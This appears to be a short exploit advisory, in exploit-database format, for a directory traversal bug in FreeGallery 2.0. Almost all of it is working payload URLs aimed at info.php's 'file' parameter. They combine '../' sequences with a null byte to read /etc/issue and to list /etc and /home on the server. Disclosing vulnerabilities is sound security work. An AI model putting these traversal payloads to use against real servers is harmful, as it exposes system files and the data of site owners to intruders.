Kod:# exploit title: wired bug in freegallery 2.0 # date: 14.o3.2o11 # author: lemlajt # software : free gallery # version: 2.0 # tested on: linux # cve : # Details: Visit: http://localhost/freegallery-2.0/info.php?base=640&file=../../../../../../../../../../../etc/issue%00 and click view source: | <a href='/www/cmsadmins/freg/freegallery-2.0/info.php?base=640&file=//////////etc/speech-dispatcher'>Next ></a><br /> Because of : ls -la /etc/| grep speech drwxr-xr-x 4 root root 4096 2010-10-07 18:13 speech-dispatcher so now: try: http://localhost/freegallery-2.0/info.php?base=640&file=../../../../../../../../../../../home/ and again: view source. http://localhost/freegallery-2.0/info.php?base=640&file=../../../../../../../../../../../home/ # regards, # lemlajt # *